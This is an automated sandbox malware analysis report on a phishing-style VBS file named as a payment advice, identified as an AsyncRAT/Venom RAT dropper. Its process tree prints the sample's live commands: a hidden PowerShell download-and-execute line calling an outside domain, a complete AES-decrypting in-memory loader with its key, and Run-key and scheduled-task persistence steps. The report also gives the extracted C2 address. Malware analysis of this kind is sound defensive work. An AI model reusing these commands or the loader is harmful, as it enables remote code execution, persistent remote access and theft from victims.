Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-12-2024 14:26
Static task
static1
Behavioral task
behavioral1
Sample
Payment Advice-Dec-2024.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Payment Advice-Dec-2024.vbs
Resource
win10v2004-20241007-en
General
-
Target
Payment Advice-Dec-2024.vbs
-
Size
78KB
-
MD5
f4360392014f0bebc78d81bbf8b1bfec
-
SHA1
275ddf9b03cc98e1f0d599140e19c64d5a941fd9
-
SHA256
799e3743d0666a4d0def179260537e1711456f39949cc672ba356d15bca9c0be
-
SHA512
bfeded4bf8bd4e82226ec0b3b3abb7dfd9d328ce1216004bdd47bf997f3058a8cf8a5973ef4e01979dbfdb71cc2c9f73a731f70e58eec2106208d7dc08000a79
-
SSDEEP
1536:xO6AlDEJYMg1Z0BYBOMadTFA63RI3xMpFgLTljdKCHBlok:kblQJYZ1Z2YBLT2mSpFg6iEk
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Dec2024
45.88.88.7:6845
zmkdvkzgwmnzhgvxwwk
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/2144-64-0x0000024CEA450000-0x0000024CEA468000-memory.dmp family_asyncrat -
Blocklisted process makes network request 3 IoCs
flow pid Process 33 2144 powershell.exe 35 2144 powershell.exe 45 2144 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 2144 powershell.exe 3504 powershell.exe 1280 powershell.exe 4600 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftService = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\system.bat\"" WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 3756 timeout.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3504 powershell.exe 3504 powershell.exe 1280 powershell.exe 1280 powershell.exe 4600 powershell.exe 4600 powershell.exe 2144 powershell.exe 2144 powershell.exe 2144 powershell.exe 2144 powershell.exe 2144 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3504 powershell.exe Token: SeDebugPrivilege 1280 powershell.exe Token: SeDebugPrivilege 4600 powershell.exe Token: SeIncreaseQuotaPrivilege 4600 powershell.exe Token: SeSecurityPrivilege 4600 powershell.exe Token: SeTakeOwnershipPrivilege 4600 powershell.exe Token: SeLoadDriverPrivilege 4600 powershell.exe Token: SeSystemProfilePrivilege 4600 powershell.exe Token: SeSystemtimePrivilege 4600 powershell.exe Token: SeProfSingleProcessPrivilege 4600 powershell.exe Token: SeIncBasePriorityPrivilege 4600 powershell.exe Token: SeCreatePagefilePrivilege 4600 powershell.exe Token: SeBackupPrivilege 4600 powershell.exe Token: SeRestorePrivilege 4600 powershell.exe Token: SeShutdownPrivilege 4600 powershell.exe Token: SeDebugPrivilege 4600 powershell.exe Token: SeSystemEnvironmentPrivilege 4600 powershell.exe Token: SeRemoteShutdownPrivilege 4600 powershell.exe Token: SeUndockPrivilege 4600 powershell.exe Token: SeManageVolumePrivilege 4600 powershell.exe Token: 33 4600 powershell.exe Token: 34 4600 powershell.exe Token: 35 4600 powershell.exe Token: 36 4600 powershell.exe Token: SeIncreaseQuotaPrivilege 4600 powershell.exe Token: SeSecurityPrivilege 4600 powershell.exe Token: SeTakeOwnershipPrivilege 4600 powershell.exe Token: SeLoadDriverPrivilege 4600 powershell.exe Token: SeSystemProfilePrivilege 4600 powershell.exe Token: SeSystemtimePrivilege 4600 powershell.exe Token: SeProfSingleProcessPrivilege 4600 powershell.exe Token: SeIncBasePriorityPrivilege 4600 powershell.exe Token: SeCreatePagefilePrivilege 4600 powershell.exe Token: SeBackupPrivilege 4600 powershell.exe Token: SeRestorePrivilege 4600 powershell.exe Token: SeShutdownPrivilege 4600 powershell.exe Token: SeDebugPrivilege 4600 powershell.exe Token: SeSystemEnvironmentPrivilege 4600 powershell.exe Token: SeRemoteShutdownPrivilege 4600 powershell.exe Token: SeUndockPrivilege 4600 powershell.exe Token: SeManageVolumePrivilege 4600 powershell.exe Token: 33 4600 powershell.exe Token: 34 4600 powershell.exe Token: 35 4600 powershell.exe Token: 36 4600 powershell.exe Token: SeIncreaseQuotaPrivilege 4600 powershell.exe Token: SeSecurityPrivilege 4600 powershell.exe Token: SeTakeOwnershipPrivilege 4600 powershell.exe Token: SeLoadDriverPrivilege 4600 powershell.exe Token: SeSystemProfilePrivilege 4600 powershell.exe Token: SeSystemtimePrivilege 4600 powershell.exe Token: SeProfSingleProcessPrivilege 4600 powershell.exe Token: SeIncBasePriorityPrivilege 4600 powershell.exe Token: SeCreatePagefilePrivilege 4600 powershell.exe Token: SeBackupPrivilege 4600 powershell.exe Token: SeRestorePrivilege 4600 powershell.exe Token: SeShutdownPrivilege 4600 powershell.exe Token: SeDebugPrivilege 4600 powershell.exe Token: SeSystemEnvironmentPrivilege 4600 powershell.exe Token: SeRemoteShutdownPrivilege 4600 powershell.exe Token: SeUndockPrivilege 4600 powershell.exe Token: SeManageVolumePrivilege 4600 powershell.exe Token: 33 4600 powershell.exe Token: 34 4600 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2144 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 3204 wrote to memory of 3504 3204 WScript.exe 83 PID 3204 wrote to memory of 3504 3204 WScript.exe 83 PID 3204 wrote to memory of 4704 3204 WScript.exe 100 PID 3204 wrote to memory of 4704 3204 WScript.exe 100 PID 4704 wrote to memory of 5096 4704 cmd.exe 102 PID 4704 wrote to memory of 5096 4704 cmd.exe 102 PID 4704 wrote to memory of 1280 4704 cmd.exe 103 PID 4704 wrote to memory of 1280 4704 cmd.exe 103 PID 1280 wrote to memory of 4600 1280 powershell.exe 104 PID 1280 wrote to memory of 4600 1280 powershell.exe 104 PID 1280 wrote to memory of 1632 1280 powershell.exe 107 PID 1280 wrote to memory of 1632 1280 powershell.exe 107 PID 1632 wrote to memory of 3544 1632 WScript.exe 108 PID 1632 wrote to memory of 3544 1632 WScript.exe 108 PID 3544 wrote to memory of 404 3544 cmd.exe 110 PID 3544 wrote to memory of 404 3544 cmd.exe 110 PID 3544 wrote to memory of 2144 3544 cmd.exe 111 PID 3544 wrote to memory of 2144 3544 cmd.exe 111 PID 2144 wrote to memory of 4616 2144 powershell.exe 114 PID 2144 wrote to memory of 4616 2144 powershell.exe 114 PID 4616 wrote to memory of 3756 4616 cmd.exe 116 PID 4616 wrote to memory of 3756 4616 cmd.exe 116
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment Advice-Dec-2024.vbs"1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3504
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7YiAJ5/sPelca+hTcek78jxnU9ioiOBmM7qe4UB010A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K5VNkdetZe//Td3nkfB/hw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zGnmY=New-Object System.IO.MemoryStream(,$param_var); $gcYTH=New-Object System.IO.MemoryStream; $twAan=New-Object System.IO.Compression.GZipStream($zGnmY, [IO.Compression.CompressionMode]::Decompress); $twAan.CopyTo($gcYTH); $twAan.Dispose(); $zGnmY.Dispose(); $gcYTH.Dispose(); $gcYTH.ToArray();}function execute_function($param_var,$param2_var){ $nREcc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $hmWZi=$nREcc.EntryPoint; $hmWZi.Invoke($null, $param2_var);}$BBtPh = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $BBtPh;$VJQrS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BBtPh).Split([Environment]::NewLine);foreach ($EvXNX in $VJQrS) { if ($EvXNX.StartsWith('jVPqiiWHWVTrLedMZeIO')) { $Qjyhd=$EvXNX.Substring(20); break; }}$payloads_var=[string[]]$Qjyhd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:5096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_436_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_436.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4600
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_436.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_436.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7YiAJ5/sPelca+hTcek78jxnU9ioiOBmM7qe4UB010A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K5VNkdetZe//Td3nkfB/hw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zGnmY=New-Object System.IO.MemoryStream(,$param_var); $gcYTH=New-Object System.IO.MemoryStream; $twAan=New-Object System.IO.Compression.GZipStream($zGnmY, [IO.Compression.CompressionMode]::Decompress); $twAan.CopyTo($gcYTH); $twAan.Dispose(); $zGnmY.Dispose(); $gcYTH.Dispose(); $gcYTH.ToArray();}function execute_function($param_var,$param2_var){ $nREcc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $hmWZi=$nREcc.EntryPoint; $hmWZi.Invoke($null, $param2_var);}$BBtPh = 'C:\Users\Admin\AppData\Roaming\Windows_Log_436.bat';$host.UI.RawUI.WindowTitle = $BBtPh;$VJQrS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BBtPh).Split([Environment]::NewLine);foreach ($EvXNX in $VJQrS) { if ($EvXNX.StartsWith('jVPqiiWHWVTrLedMZeIO')) { $Qjyhd=$EvXNX.Substring(20); break; }}$payloads_var=[string[]]$Qjyhd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp75F1.tmp.bat""7⤵
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\system32\timeout.exetimeout 38⤵
- Delays execution with timeout.exe
PID:3756
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
Filesize
1KB
MD5b66db53846de4860ca72a3e59b38c544
SHA12202dc88e9cddea92df4f4e8d83930efd98c9c5a
SHA256b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030
SHA51272eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
69KB
MD567fdaf4f143ad3cdab6f3c542076b194
SHA18a7474470f2c47e3f301aef70da5ef415c38cff2
SHA256f10e4792e78f14998d0334d5d35b5efa825581c917a80e6d8ee096ee714e0c7e
SHA51264d68d7e8dbad526a2d4d09f4a3ba8b2a28a97a79123ad303c3aea39be8652fc2ad9fdc3f85ddbf68c0713e6186b8219774cd6c46cf90ac3f6a61711b62939e4
-
Filesize
171B
MD5fc999842b79c55444277dab167b37515
SHA1f452f24a137a659e0dc879d7f85f7a39de90fc00
SHA2569fc95a6ccb36eb771aa003c854129e99406fc4fa3c09522c24b8d59acbb68e8a
SHA51279102839bad6b5bfe2ffe30935676db6c519c0c25b99950bd396bd865a64c28b45b21dc1acf73608ebc55c0162f806c2f1c1f184dec3d40cd7ab0871d790d25a
-
Filesize
115B
MD5ffdcbcbc77bf7f2bf1b87fffd2b644c8
SHA1bd1ac897eac8f8d017ab635ea91d4a1784747c31
SHA25633b354e21832c89c29d1138002f87fb9fa487c4f6c59ca925f6cf55121e1178b
SHA512db920d1bac6107d935e3a7deed060b5b0b54785e40d2e53ff0fa1ecbd3edb86e5b8932c197047ccf684b2b4e212a22d3b4a3010ae63b90e750c17011ddd96acb